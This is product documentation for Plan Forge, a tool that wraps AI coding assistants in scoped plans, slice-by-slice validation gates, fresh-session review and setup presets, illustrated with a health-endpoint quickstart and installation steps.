The specifier agent interviews you. Here are the answers for a health endpoint:
Problem: Load balancers need to verify the service is running.
Scenarios: GET /health every 30s → 200 OK {"status":"healthy"}.
Criteria: Returns 200 with JSON. Under 50ms. No auth required.
Edge cases: DB unreachable → 503 {"status":"degraded","reason":"database"}.
Out of scope: No deep checks (Redis, APIs). No metrics endpoint.
The agent creates docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md.
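The interview answers above amount to a small behavioral contract. As a language-neutral illustration (the Quickstart's own gates use dotnet), here is a minimal Python sketch of that contract; `health_response` is a hypothetical name, and the boolean argument stands in for a real database probe.

```python
import json


def health_response(database_reachable: bool) -> tuple:
    """Return (status code, JSON body) for GET /health per the spec answers."""
    if database_reachable:
        # Scenario: load balancer poll returns 200 OK with a healthy status.
        return 200, json.dumps({"status": "healthy"})
    # Edge case: database unreachable returns 503 with a degraded status.
    return 503, json.dumps({"status": "degraded", "reason": "database"})


if __name__ == "__main__":
    for reachable in (True, False):
        code, body = health_response(reachable)
        print(code, body)
```

The sketch leaves out the "under 50ms" and "no auth required" criteria, which depend on the hosting framework rather than on the response logic.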
Still in the same session, attach .github/prompts/step1-preflight-check.prompt.md, replace <YOUR-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN, and send. The agent verifies git state, guardrail files, and the roadmap. For a fresh install, everything passes.
Attach .github/prompts/step2-harden-plan.prompt.md, replace <YOUR-PLAN>, and send. The hardener adds the mandatory blocks to your plan file:
## Scope Contract ← Files the AI may touch
## MUST Criteria ← Non-negotiable requirements
## Execution Slices ← 30–120 min checkpointed chunks
### Slice N
Tasks: …
Gate: dotnet build && dotnet test ← Must pass before next slice
Stop if: Gate fails
## Rollback Plan ← How to undo safely
When the agent says "Plan hardened", Session 1 is complete.
There are three ways to run execution; choose one:
pforge run-plan docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
Kick off and walk away. Watch at localhost:3100/dashboard.
pforge run-plan --assisted docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
You code; the orchestrator validates gates automatically.
Start a new Copilot session. Attach step3-execute-slice.prompt.md. The AI reads the plan and executes slice by slice.
The executor builds the endpoint, runs build, runs test, and reports pass/fail at each gate. If a gate fails, execution stops: no silent failures.
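The stop-on-failure behavior described here can be sketched in a few lines. This is an illustration under stated assumptions, not the pforge orchestrator: `run_slices` is a hypothetical helper, and each gate is modeled as a command whose exit code decides pass or fail.

```python
import subprocess
import sys


def run_slices(slices: list) -> list:
    """Run each slice's gate command in order; stop at the first failing gate."""
    results = []
    for name, gate_command in slices:
        passed = subprocess.run(gate_command).returncode == 0
        results.append((name, passed))
        if not passed:
            break  # Stop condition: later slices never run after a failed gate.
    return results


if __name__ == "__main__":
    # Stand-in gates: a Python one-liner that exits 0 (pass) or 1 (fail).
    ok = [sys.executable, "-c", "raise SystemExit(0)"]
    bad = [sys.executable, "-c", "raise SystemExit(1)"]
    for name, passed in run_slices([("slice-1", ok), ("slice-2", bad), ("slice-3", ok)]):
        print(name, "PASS" if passed else "FAIL")
```

In the demo run, slice-3 never appears in the results because the failed gate on slice-2 halts the loop.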
You've completed Sessions 1 and 2 of the 4-session pipeline:
Session 1 (Specify & Plan) ✓ Described what you wanted; AI structured it
Session 2 (Execute) ✓ AI built it slice-by-slice with validation gates
Session 3 (Review) … Next step →
Session 4 (Ship) … Final step →
Sweep, review, and ship in 10 minutes.
This covers Steps 4–6: the completeness sweep, independent review, and shipping. For deeper explanations of each step see Chapter 6: Your First Plan.
The completeness sweep scans every code file for markers that indicate unfinished work: TODO, FIXME, HACK, stub, placeholder, mock data. For a health endpoint this should return zero.
pforge sweep
If the sweep finds any markers, resolve them before continuing. Deferred-work markers are how technical debt silently accumulates; this is where you catch them before they ship.
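To make the idea concrete, here is a minimal sketch of a marker scan. It is not the implementation behind pforge sweep: `sweep_text` is a hypothetical helper, and the case-insensitive, whole-word matching is an assumption made for the example.

```python
import re

# Marker list taken from the sweep description.
MARKERS = ["TODO", "FIXME", "HACK", "stub", "placeholder", "mock data"]
# Assumption: match whole words, ignoring case.
MARKER_RE = re.compile(
    r"\b(?:" + "|".join(re.escape(m) for m in MARKERS) + r")\b", re.IGNORECASE
)


def sweep_text(path: str, text: str) -> list:
    """Return (path, line number, marker) for each line containing a marker."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = MARKER_RE.search(line)
        if match:
            findings.append((path, number, match.group(0)))
    return findings


if __name__ == "__main__":
    sample = "def health():\n    # TODO: add database check\n    return {}\n"
    for finding in sweep_text("health.py", sample):
        print(finding)
```

The word-boundary match keeps identifiers such as `stubborn` from being reported as a `stub` marker.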
Critical: start a brand-new chat session by clicking the + button. The reviewer must not carry context from the builder; context contamination is the most common source of missed errors.
1. Attach .github/prompts/step5-review-gate.prompt.md
2. Replace <YOUR-HARDENED-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and send
The review agent checks every change against the Scope Contract: forbidden files not touched, no architecture violations, test coverage meets MUST criteria, no scope creep. For a simple health endpoint, expect a clean PASS.
One final session (new or continued if context allows) to commit and close out the feature:
1. Attach .github/prompts/step6-ship.prompt.md
2. Commit with the message feat(health): add GET /health endpoint
3. Update docs/plans/DEPLOYMENT-ROADMAP.md to mark the phase complete
# Stage everything and commit
git add -A
git commit -m "feat(health): add GET /health endpoint"
git push origin main
You've completed all 4 sessions of the Plan Forge pipeline:
Session 1 (Specify & Plan) ✓ Described the feature; AI structured the plan
Session 2 (Execute) ✓ AI built it slice-by-slice with gates
Session 3 (Review) ✓ Fresh AI session audited for drift and errors
Session 4 (Ship) ✓ Committed, roadmap updated, postmortem captured
The four-session model is deliberate. Each session has a single responsibility and fresh context; the reviewer couldn't carry bias from the builder even if it wanted to. This is what makes the pipeline scale from a health endpoint to a 40-slice refactor.
You've run the full pipeline end-to-end. The same process works for any feature; the pipeline scales with the work:
Deep dive on scope contracts, slices, validation gates, and stop conditions.
Live slice view, cost tracking, traces, and replay — your command desk.
Project Principles, profiles, and forge.json — make Plan Forge yours.
The Forge Shop, four stations, and why this architecture works.
Three worked case studies — the closed loop, the 99-vs-44 A/B test, the quorum run — for context on what just happened.
The AI-Native SDLC Forge Shop. One workshop, four stations, every phase of the lifecycle.
Plan Forge is the orchestration harness that sits on top of GitHub Copilot (and other AI coding tools). It does not replace your model or your IDE; it adds the SDLC layer GitHub deliberately leaves to the ecosystem: planning, validation gates, memory, cost control, and reviewer separation.
It is MIT-licensed because your SDLC is yours. Your institutional memory lives in OpenBrain, a user-owned service, because your accumulated decisions should not be trapped inside any one AI vendor.
Plan Forge is a complete AI-native SDLC workshop. Instead of giving your AI agent a single code-generation step, it gives the agent a whole shop: four specialized stations (Smelt, Forge, Guard, Learn) connected by gates, telemetry, and persistent memory.
"A blacksmith without a shop is just a hammer in a hand."
Plan: a .md file in docs/plans/ describing one feature: what to build, what files it can touch, what tests must pass.
Gate: a check (for example, dotnet test) that must pass before the next slice runs. Gates are how Plan Forge knows the AI didn't break anything.
All five terms have full entries in the Glossary.
Every station handles one phase of the software lifecycle. Every station is AI-run and product-owner-supervised — you own spec, direction, and final acceptance; the shop owns build, review, supervision, defense, and learning. See The Virtual Engineering Team below for the role-by-role map.
| Station | Phase | What runs here | What comes out |
|---|---|---|---|
| 🪨 Smelt | Intake → scope contract | Specifier agent, hardening runbook, /specify, /harden-plan, Project Principles | A Scope Contract the Forge can execute without follow-up questions |
| 🔨 Forge | Scope contract → shipped code | pforge run-plan, slice gates, quorum mode, auto-escalation, cost ledger | Green tests, green CI, green cost ledger, or an honest stop with a fix proposal |
| 🛡️ Guard | Post-deploy defense (LiveGuard) | Secret scan, env drift, regression guard, incident triage, fix proposals | Pre-deploy block on severity ≥ high, post-slice drift advisory, triaged incidents |
| 🧠 Learn | Memory & retrospectives | OpenBrain, bug registry, testbed findings, Health DNA, Forge Intelligence | Tomorrow's plan is colder, faster, and less wrong |
Plan Forge isn't "AI plus a code-completion plugin." It's a full enterprise engineering shop where every traditional role is filled by a specialized agent or guardrail, governed by 40 years of software engineering practice encoded into 17+ auto-loading instruction files and 20 specialized reviewers.
| Traditional engineering role | Plan Forge equivalent |
|---|---|
| Product Owner (spec, direction, acceptance) | You — non-negotiable, non-replaceable |
| IC engineers (architecture, security, performance, DB, deploy, API, accessibility, multi-tenancy, CI/CD, observability, dependency, compliance) | 20 specialized agents + 17 auto-loading guardrail files |
| Tech lead / staff engineer | Quorum mode (multi-model consensus) + auto-escalation on slice failure |
| Engineering manager | Forge-Master Observer + Auditor — agents supervising agents, not metaphorically, literally |
| QA team | Tempering harness + testbed + regression guard + slice gates |
| SRE / on-call | LiveGuard — secret scan, drift report, dep watch, env diff, incident capture, runbooks |
| Continuous improvement / retros | Audit loop + bug registry auto-smelt + Reflexion lessons + auto-skill promotion (loops that run unattended for weeks and learn from every pass) |
| Architecture review board | Independent Session-3 review gate (fresh AI session, full guardrail load) |
| Institutional knowledge / wiki | OpenBrain L3 memory with Hallmark provenance |
| Release manager | Shipper agent + release-checklist + version.instructions.md |
Pick a preset (dotnet, typescript, python, etc.), declare Project Principles, set forbidden patterns. One-time, then locked.
AI coding agents are powerful but directionless.
They generate code fast. But fast isn't the same as good. Without a full shop around them (scope contracts, slice gates, post-deploy guards, and institutional memory), AI-generated code tends to be untestable, insecure, architecturally inconsistent, and impossible to maintain at scale. That's fine for prototypes; it's not fine for production systems.
You've probably lived this pattern:
You fire up an AI agent (Copilot, Cursor, Claude, whatever) and describe the app you want. The first 80% is magic. Files appear, components wire up, the database schema materializes. You're shipping faster than you ever thought possible.
Then complexity creeps in. Auth flows interact with database queries. Middleware chains get long. The agent still works, but you notice it's making assumptions without asking: it picked a caching strategy you wouldn't have chosen, and it refactored code from three sessions ago that was working fine.
Then the wall. Every change breaks something else. Fix the auth bug, break the dashboard. Fix the dashboard, break the API response format. The agent is confidently producing code that compiles but doesn't work. You're debugging AI-generated code you don't fully understand, in an architecture you didn't fully choose.
The pattern everyone hits: prompt → hope → fix → re-prompt → hope harder.
Plotted as completion vs. confidence, the failure mode is consistent across teams and tools:
The fix is the full shop: Smelt before the agent writes a line of code, Forge the scope so it can't drift, Guard what ships, and Learn with a memory that carries decisions forward.
Vibe coding gets you a prototype. Plan Forge gets you a product.
Longer narrative version with the failure stories: The 80/20 Wall: Why AI Agents Break What They Build.
Automated execution (pforge run-plan) and quorum mode use your IDE's AI model, consuming premium requests.
Direct API providers (xAI Grok, OpenAI) require API keys and are billed per-token.
The Dashboard's Cost tab tracks every dollar.
Without the shop, AI coding agents:
If you've managed human dev teams, you know guardrails aren't about distrust; they're about consistency. The same principle applies when your team members are AI models.
These problems get worse the less technical your team is: you may not even notice the drift until it's too late.
| Without the shop | With Plan Forge |
|---|---|
| Agent writes code that passes once, breaks in production | Code follows your architecture from the first line (Smelt) |
| 30–50% of AI-generated code needs rework after review | Independent review catches drift before merge (Forge) |
| Agent re-discovers solved problems every session | Persistent memory loads prior decisions in seconds (Learn) |
| Secrets and CVEs slip into deploys | LiveGuard blocks pre-deploy on severity ≥ high (Guard) |
| Context window wasted on exploration and backtracking | Hardened plan tells the agent exactly what to build |
| "It works on my machine" shipped to staging | Validation gates pass at every slice boundary |
Plan Forge is an AI-native SDLC workshop (four stations connected by gates, telemetry, and memory) that converts your rough ideas into shipped, defended, remembered software. It installs guardrail files, MCP tools, reviewer agents, and a live dashboard into your project so every AI edit happens inside the shop, not next to it.
A blacksmith doesn't hand raw iron to a customer. They heat it, hammer it, temper it, and, in a real shop, the master smith watches it ship, remembers which blades broke, and sharpens the process for next time.
Plan Forge does the same for your development plans:
| Shop Stage | Station | What Happens |
|---|---|---|
| 🔥 Heat, raw ore | Smelt | You describe what you want; the Specifier agent extracts a Scope Contract |
| 🔨 Hammer, shape it | Forge | Plan broken into slices with validation gates; AI builds slice-by-slice |
| 💧 Quench, check the edge | Forge | Fresh-session review audits for drift, completeness, quality |
| 🛡️ Guard, patrol the floor | Guard | LiveGuard scans secrets, drift, regressions, CVEs pre- and post-deploy |
| 🧠 Remember, sharpen the process | Learn | Every incident, fix, and review feeds OpenBrain memory + bug registry + Health DNA |
You're using Copilot or Claude to build features, but you've noticed the AI drifts when sessions get long. You spend time re-explaining your patterns. Plan Forge gives you a repeatable pipeline that remembers your standards, validates at every step, and catches the mistakes you'd normally catch in code review, except there's no reviewer. You are the team.
Your team uses AI tools but everyone gets different quality results. Junior devs get code that works but violates your architecture. Senior devs spend review cycles catching AI-generated antipatterns. Plan Forge makes the architecture the default: instruction files load automatically, validation gates enforce build+test, and the reviewer-gate agent catches drift before anyone opens a PR.
You need audit trails, consistent architecture, and code that meets compliance standards. Plan Forge gives you phase-level tracking (DEPLOYMENT-ROADMAP.md), per-slice cost accounting, OTLP telemetry, and 19 independent reviewer agents, including compliance, security, and multi-tenancy auditors that run automatically. Every execution has a trace.
Positioning matters more than features when an entire category is in motion. The shortest answer is paired: what Plan Forge claims to be, and the closest things it deliberately is not.
| Plan Forge is | Plan Forge is not |
|---|---|
| The orchestration harness that sits on top of GitHub Copilot (and other AI coding tools). | An AI model. Plan Forge works with whatever AI you already use: Copilot, Claude, Cursor, Codex, Gemini, Windsurf, or any tool that accepts text prompts. |
| The SDLC layer GitHub deliberately leaves to the ecosystem: planning, validation gates, memory, cost control, and reviewer separation. | A code generator. Plan Forge doesn't write your code; it tells the AI how to write it, then verifies the result. |
| Opinionated about software shape (interfaces, DTOs, typed exceptions, tests); see the 99-vs-44 evidence below. | Opinionated about your stack. Nine presets cover .NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC. Each installs stack-appropriate guardrails. |
| MIT-licensed because your SDLC is yours. | A managed cloud service or a process you rent. Plan Forge runs entirely inside your existing IDE, CLI, and repo. |
| Tied to your repo's source of truth via GitHub Issues, PRs, and Actions: Plan Forge writes to the artifacts you already audit. | A CI/CD system. It doesn't deploy your app. It validates that what's built matches what was planned. Your CI pipeline is a separate concern. |
| Designed so your institutional memory lives in OpenBrain, a user-owned service, because your accumulated decisions should not be trapped inside any one AI vendor. | A project manager. It doesn't assign tasks to humans or track sprints. It structures work for AI agents: slices, gates, scope contracts. |
The shop story is testable. The April 2026 .NET A/B test built the same WebAPI twice from an identical .NET 10 skeleton (same git commit baseline) using the same model (Claude Opus 4.6) on the same machine. One run used Plan Forge guardrails; the other used pure vibe coding. Wall-clock time was comparable: 7 minutes for Plan Forge, 8 minutes for vibe coding (the extra minute went to fighting build errors).
| Metric | Vibe coding | Plan Forge | Delta |
|---|---|---|---|
| Tests | 13 | 60 | 4.6× more |
| Interfaces | 0 | 6 | vibe = 0 |
| DTOs | 0 | 9 | vibe = 0 |
| Typed exceptions | 0 | 4 | vibe = 0 |
| CancellationToken references | 0 | 79 | vibe = 0 |
| Quality score (/100) | 44 | 99 | 2.25× higher |
| Build time | 8 min | 7 min | guardrails didn't add overhead |
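The two ratio entries in the Delta column follow directly from the raw counts. A quick check of the arithmetic, using only the numbers in the table:

```python
# Raw counts from the A/B table.
tests_vibe, tests_forge = 13, 60
score_vibe, score_forge = 44, 99

tests_ratio = round(tests_forge / tests_vibe, 1)  # 60 / 13 is about 4.615
score_ratio = round(score_forge / score_vibe, 2)  # 99 / 44 is exactly 2.25

print(f"tests: {tests_ratio}x, quality: {score_ratio}x")
# prints "tests: 4.6x, quality: 2.25x"
```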
The vibe run spent its extra minute fighting build errors caused by an EF Core InMemory misconfiguration. The model had to diagnose, backtrack, and fix it, and the fix cost a requirement (banker's rounding). That rework cycle is invisible in a demo; at scale it is the dominant cost.
Full A/B test write-up with code samples, methodology, and links to both repositories: The A/B Test: 99 vs 44 — Same App, Same Model, Same Time.
This manual follows the four stations of the shop:
📄 Full reference: README on GitHub
Tour of the Forge Shop: four stations, the gates between them, and the sessions that keep them honest.
Plan Forge is not one step; it's a workshop. Every change to your code flows through four stations, each with its own tools, its own artifacts, and its own gate to the next station.
The stations are connected by gates: Smelt won't hand the plan to Forge until the Scope Contract is crisp; Forge won't ship code until slice gates are green; Guard won't approve a deploy until secret-scan + env-drift are clean; Learn absorbs everything and feeds it back into Smelt for the next plan.
Drawn linearly, Plan Forge looks like a 7-step pipeline. Drawn honestly, it's a closed loop. Every failed test, every regression caught by tempering, every placeholder spotted by a discovery scan re-enters the Smelt station as new ore: auto-smelted into a Crucible idea, hardened into a slice, executed, and re-tested. The loop only pauses when there's nothing left to find.
The path from raw scope to shipped code is a 7-step pipeline (Steps 0–6). Steps 0–2 happen in Smelt, Steps 3–6 happen in Forge, and Step 6 hands off to Guard and Learn.
You describe what you want (Step 0, Smelt). The AI creates a spec. A pre-flight check verifies your setup (Step 1, Smelt). The plan gets hardened into a binding scope contract with slices, gates, and forbidden actions (Step 2, Smelt); this is when Smelt hands off to Forge. The AI builds it slice by slice, validated at every boundary (Step 3, Forge). A completeness sweep eliminates stubs and TODOs (Step 4, Forge). A fresh session audits everything (Step 5, Forge). The shipper commits, LiveGuard runs its pre-deploy scan (Step 6, Guard), and OpenBrain captures lessons (Step 6, Learn).
Specify, verify, harden. Produces the scope contract.
Execute slices, sweep for completeness.
Fresh context. Independent review.
Commit, LiveGuard scan, capture lessons.
The executor shouldn't self-audit; that's like grading your own exam. Each session starts fresh and loads the same guardrails, but brings independent judgment. Session 3 (Review) has never seen the code being written: it reads the plan, reads the code, and checks for drift. Session 4 is when Guard and Learn take over: LiveGuard does its pre-deploy scan, OpenBrain writes the lessons.
The grading-your-own-exam analogy above is the short version. Three concrete mechanisms make session isolation a structural requirement rather than a stylistic preference:
The session that wrote the code will defend it, not because the model is stubborn but because the bad code and the proposed fix live in the same token sequence. The model's belief that the code is correct is encoded in the same context that produced it; the model literally cannot evaluate the code from a position of "I have not seen this before." A fresh session reads the same code without any prior commitment to it.
Build sessions accumulate context as they work: rejected approaches, half-considered alternatives, partial refactors. By the time the session finishes, its reasoning is shaped by paths it considered but didn't take. A reviewer in the same session inherits all of that as background noise. A reviewer in a fresh session sees only the final code, against the original plan, with no memory of the rabbit holes.
Some bugs are only visible from outside the build session's mental model. A naming inconsistency, a forgotten edge case, an architectural violation that the build session rationalized in the moment: these surface immediately to a reviewer that didn't participate in the rationalization. The build session is not lying; it cannot see what is invisible from inside its own context.
The v2.18 Temper Guards and Warning Signs system codified the failure modes that emerged from this pattern: the specific shortcuts agents take that produce compiling but architecturally broken code. Each instruction file now teaches agents not just what to do but why not to skip it. Session isolation is the structural defense; Temper Guards are the named anti-patterns it catches.
Source material: The 80/20 Wall and Guardrails Lessons Learned. The grading-your-own-exam analogy is adapted from Lesson 3.
After setup, Plan Forge installs five types of files into your .github/ directory:
.github/
├── instructions/ ← Rules (auto-load by file type)
│ ├── architecture-principles.instructions.md
│ ├── security.instructions.md
│ ├── testing.instructions.md
│ ├── database.instructions.md
│ └── ... (14–18 files per preset)
├── agents/ ← Reviewer personas (read-only audit)
│ ├── architecture-reviewer.agent.md
│ ├── security-reviewer.agent.md
│ └── ... (12 agents)
├── prompts/ ← Pipeline templates (attach in chat)
│ ├── step0-specify-feature.prompt.md
│ ├── step2-harden-plan.prompt.md
│ └── ... (7 pipeline + scaffolding)
├── skills/ ← Multi-step procedures (slash commands)
│ ├── security-audit/SKILL.md
│ ├── forge-execute/SKILL.md
│ └── ... (11 skills)
├── hooks/ ← Lifecycle automation
│ ├── sessionStart.sh
│ └── postToolUse.sh
└── copilot-instructions.md ← Master config file
| File Type | What It Does | Analogy |
|---|---|---|
| Instruction files | Auto-load based on what file you're editing | The rulebook |
| Agent definitions | Specialized reviewers that audit your code | Expert consultants |
| Pipeline prompts | Step-by-step workflow templates | The recipe |
| Skills | Multi-step executable procedures | Power tools |
| Lifecycle hooks | Run automatically at agent lifecycle points | Safety rails |
Each instruction file has an applyTo pattern in its YAML frontmatter. When you edit a file that matches the pattern, the instruction file loads automatically into the AI's context:
---
description: Security best practices
applyTo: "**/auth/**,**/security/**,**/middleware/**"
---
When you open src/auth/token-validator.ts, the security instruction file loads. When you open src/models/User.ts, the database instruction file loads. No manual action is needed: the AI reads the right rules for the right code.
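The matching rule can be approximated in a few lines. This sketch uses Python's `fnmatch` as a stand-in for the editor's real glob matcher, whose semantics may differ in edge cases (for example, a file directly under a top-level `auth/` folder); `instruction_applies` is a hypothetical helper.

```python
from fnmatch import fnmatchcase


def split_apply_to(apply_to: str) -> list:
    """Split a comma-separated applyTo value into individual glob patterns."""
    return [pattern.strip() for pattern in apply_to.split(",") if pattern.strip()]


def instruction_applies(apply_to: str, path: str) -> bool:
    """Return True when the path matches any applyTo pattern (fnmatch semantics)."""
    return any(fnmatchcase(path, pattern) for pattern in split_apply_to(apply_to))


if __name__ == "__main__":
    # applyTo value from the security instruction file's frontmatter.
    security = "**/auth/**,**/security/**,**/middleware/**"
    for path in ("src/auth/token-validator.ts", "src/models/User.ts"):
        print(path, instruction_applies(security, path))
```

Under these assumptions the auth file matches the security patterns and the model file does not, which mirrors the behavior described in the paragraph above.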
.forge.json Config
This file stores your project's Plan Forge configuration:
{
"preset": "dotnet",
"modelRouting": {
"default": "claude-sonnet-4.6",
"execute": "grok-4",
"review": "claude-opus-4.7"
},
"escalationChain": ["grok-4", "claude-opus-4.7", "gpt-5.2-codex"],
"quorumThreshold": 6
}
Key settings: which preset was used, which models to use for each role (execution vs review), the escalation chain when a model fails, and the complexity threshold for quorum mode.
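One way to read those settings from code is sketched below. The helpers are hypothetical, and three behaviors are assumptions rather than documented semantics: an unlisted role falls back to `default`, escalation moves to the next entry in the chain, and quorum triggers when complexity is at or above the threshold.

```python
import json
from typing import Optional

# Same content as the .forge.json example.
FORGE_JSON = """
{
  "preset": "dotnet",
  "modelRouting": {
    "default": "claude-sonnet-4.6",
    "execute": "grok-4",
    "review": "claude-opus-4.7"
  },
  "escalationChain": ["grok-4", "claude-opus-4.7", "gpt-5.2-codex"],
  "quorumThreshold": 6
}
"""


def model_for(config: dict, role: str) -> str:
    """Pick the model for a role; unlisted roles use the default (assumption)."""
    routing = config["modelRouting"]
    return routing.get(role, routing["default"])


def next_in_chain(config: dict, failed_model: str) -> Optional[str]:
    """Return the model after failed_model in the chain, or None at the end."""
    chain = config["escalationChain"]
    if failed_model not in chain:
        return chain[0] if chain else None
    index = chain.index(failed_model)
    return chain[index + 1] if index + 1 < len(chain) else None


def needs_quorum(config: dict, complexity: int) -> bool:
    """Assumption: quorum mode applies at or above the configured threshold."""
    return complexity >= config["quorumThreshold"]


if __name__ == "__main__":
    config = json.loads(FORGE_JSON)
    print(model_for(config, "review"), next_in_chain(config, "grok-4"))
```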
A plan is just a .md file with structure. It lives in docs/plans/ and follows a template. Here's the minimal skeleton:
# Phase 1, User Authentication
## Scope Contract
**In Scope**: src/auth/**, src/middleware/auth*, tests/auth/**
**Out of Scope**: frontend, deployment, CI
**Forbidden Actions**: Do NOT modify src/database/migrations/
## MUST Criteria
- [ ] JWT token generation and validation
- [ ] Role-based access control (admin, user)
- [ ] Password hashing with bcrypt
## Execution Slices
### Slice 1, Auth Models + Migration [30 min]
**Tasks**: Create User model, JWT service
**Gate**: `dotnet build` passes, `dotnet test` passes
**Stop if**: Build fails or migration errors
### Slice 2, Auth Middleware [30 min]
**Tasks**: JWT validation middleware, role decorator
**Gate**: `dotnet test`, 6+ tests pass
**Stop if**: Any existing test regresses
The AI reads this contract and follows it literally. Slices are checkpointed: the gate at the end of each slice must pass before proceeding to the next.
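Because the skeleton is regular, the slices can be pulled out with a small parser. This is a sketch written against the exact layout shown above, not the orchestrator's parser; `parse_slices` and its dictionary keys are hypothetical.

```python
import re

# The Execution Slices portion of the skeleton, copied verbatim.
PLAN = """\
## Execution Slices
### Slice 1, Auth Models + Migration [30 min]
**Tasks**: Create User model, JWT service
**Gate**: `dotnet build` passes, `dotnet test` passes
**Stop if**: Build fails or migration errors
### Slice 2, Auth Middleware [30 min]
**Tasks**: JWT validation middleware, role decorator
**Gate**: `dotnet test`, 6+ tests pass
**Stop if**: Any existing test regresses
"""

# Heading: slice number, separator, title, optional "[N min]" estimate.
SLICE_RE = re.compile(r"^### Slice (\d+)\W+(.*?)\s*(?:\[(\d+) min\])?$")
# Field line: bold label followed by a colon and the value.
FIELD_RE = re.compile(r"^\*\*(Tasks|Gate|Stop if)\*\*:\s*(.*)$")


def parse_slices(plan_text: str) -> list:
    """Collect each slice heading and the fields that follow it."""
    slices = []
    for line in plan_text.splitlines():
        heading = SLICE_RE.match(line)
        if heading:
            minutes = int(heading.group(3)) if heading.group(3) else None
            slices.append(
                {"number": int(heading.group(1)), "title": heading.group(2), "minutes": minutes}
            )
            continue
        field = FIELD_RE.match(line)
        if field and slices:
            slices[-1][field.group(1)] = field.group(2)
    return slices


if __name__ == "__main__":
    for item in parse_slices(PLAN):
        print(item["number"], item["title"], "->", item["Gate"])
```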
These are the three building blocks of every plan:
| Concept | What It Is | Why It Matters |
|---|---|---|
| Slice | A 30–120 minute chunk of work with a clear goal | Small enough to validate, large enough to be useful. One PR's worth. |
| Gate | A validation check at the end of each slice (build, test, specific assertions) | Catches failures immediately. No silent drift. |
| Scope Contract | What files the AI can touch, what's forbidden, what's out of scope | Prevents "I'll also refactor this unrelated file" creep. |
The same pipeline can run three different ways. Pick the one that matches your tools:
| Approach | How It Works | Best For |
|---|---|---|
| Pipeline Agents | Select the Specifier agent → click handoff buttons through the chain | VS Code + Copilot. Smoothest flow. |
| Prompt Templates | Attach step0-*.prompt.md files in Copilot Chat | Learning the pipeline. You see every prompt. |
| Copy-Paste Prompts | Copy prompts from the runbook into any AI tool | Claude, Cursor, ChatGPT, terminal agents. |
All three produce identical results. The guardrails, validation gates, and pipeline steps are the same; only the delivery mechanism differs.
📄 Full reference: Multi-Agent Setup — GitHub Copilot, capabilities
Zero to pforge smith green in 10 minutes.
| Requirement | Minimum Version | Check Command | Required for |
|---|---|---|---|
| Git | 2.30+ | git --version | Everyone |
| VS Code (or Insiders) | 1.99+ | code --version | UI path |
| GitHub Copilot extension | Copilot subscription active | Copilot icon visible in status bar | UI path |
| Node.js | 18+ | node --version | CLI / server path |
Node.js is needed for the dashboard, the MCP server, pforge.ps1 / pforge.sh, and the 102 tools (REST API + WebSocket hub). Skip Node.js if you'll only use the core pipeline: prompts, instruction files, agents, and skills all live inside .github/ and run entirely inside Copilot Chat.
The fastest path: clone the repo and run the setup wizard.
git clone https://github.com/srnichols/plan-forge.git my-project-plans
cd my-project-plans
.\setup.ps1 -Preset <your-stack>
This installs all guardrails, agents, prompts, skills, and MCP tools into your project. See the preset list below.
Clone the template and run the setup wizard:
git clone https://github.com/srnichols/plan-forge.git my-project-plans
cd my-project-plans
# Interactive: the wizard asks which preset
.\setup.ps1
# Or specify directly
.\setup.ps1 -Preset dotnet
# Bash (macOS / Linux)
chmod +x setup.sh
./setup.sh --preset typescript
The wizard detects your tech stack (or uses the preset you specify), creates .github/ with instruction files, agents, prompts, skills, and hooks, generates .forge.json, and sets up .vscode/settings.json.
git clone https://github.com/srnichols/plan-forge.git ../plan-forge
cd ../plan-forge && ./setup.ps1 -ProjectPath ../my-existing-app -Preset typescript
Nine presets, each tailored to a tech stack. Each installs ~18 instruction files, 12 agents, 11 skills, and 8 pipeline prompts.
.\setup.ps1 -Preset dotnet,typescript
After setup completes, your project has:
.github/
├── instructions/ ~26 files (architecture, security, testing, database, ..., 18 preset + 8 shared)
├── agents/ 19 files (6 stack-specific + 7 cross-stack + 5 pipeline + 1 audit-classifier)
├── prompts/ ~23 files (15 preset + 8 shared pipeline: project-profile + step0–step6)
├── skills/ 11 dirs (varies by preset: dotnet 11, typescript 10)
├── hooks/ 5 items (PreDeploy.md, PreCommit.mjs, PreAgentHandoff.md, PostSlice.md, plan-forge.json)
└── copilot-instructions.md (master config)
.forge.json (project configuration)
.vscode/settings.json (Copilot settings)
docs/plans/
├── DEPLOYMENT-ROADMAP.md (phase tracker)
└── AI-Plan-Hardening-Runbook.md (methodology reference)
pforge.ps1 / pforge.sh (CLI scripts)
Plan Forge's hooks are PreDeploy, PreCommit, PreAgentHandoff, and PostSlice (plus the plan-forge.json hook config). These are not the same as Claude Code's hook names (SessionStart, PreToolUse, etc.); if you're coming from Claude Code, the trigger semantics differ. See .github/hooks/plan-forge.json for the live configuration.
pforge smith
The Smith inspects your forge: environment, VS Code config, setup health, version currency. Run it to confirm everything is green:
.\pforge.ps1 smith
╔══════════════════════════════════════════════════════════════╗
║ Plan Forge, The Smith ║
╚══════════════════════════════════════════════════════════════╝
Environment:
✓ git 2.44.0
✓ code (VS Code CLI) 1.99.0
✓ PowerShell 7.5.0
✓ node 22.3.0
VS Code Configuration:
✓ chat.agent.enabled = true
✓ chat.promptFiles = true
Setup Health:
✓ .forge.json valid (preset: dotnet, v2.17.0)
✓ 21 instruction files (expected: ≥17 for dotnet)
✓ 19 agent definitions
✓ copilot-instructions.md exists
────────────────────────────────────────────────────
Results: 10 passed | 0 failed | 0 warnings
A failed check prints a FIX: suggestion. Common fix: add "chat.agent.enabled": true to .vscode/settings.json. See Chapter 15: Troubleshooting for more.
Plan Forge works primarily with VS Code + GitHub Copilot. But if you also use Claude Code, Cursor, Codex, Gemini, or Windsurf, add their adapters during setup:
# Add Claude Code support
.\setup.ps1 -Preset dotnet -Agent claude
# Add all agent adapters at once
.\setup.ps1 -Preset dotnet -Agent all
| Agent Flag | Tool | Files Created |
|---|---|---|
| copilot (default) | GitHub Copilot | .github/ instructions, agents, skills, prompts, hooks |
| claude | Claude Code | CLAUDE.md with embedded guardrails + slash commands |
| cursor | Cursor | .cursorrules + .cursor/rules/*.mdc |
| codex | Codex CLI | AGENTS.md + skill scripts |
| gemini | Gemini CLI | GEMINI.md + .gemini/commands/*.toml |
| windsurf | Windsurf | .windsurfrules + .windsurf/rules/*.md |
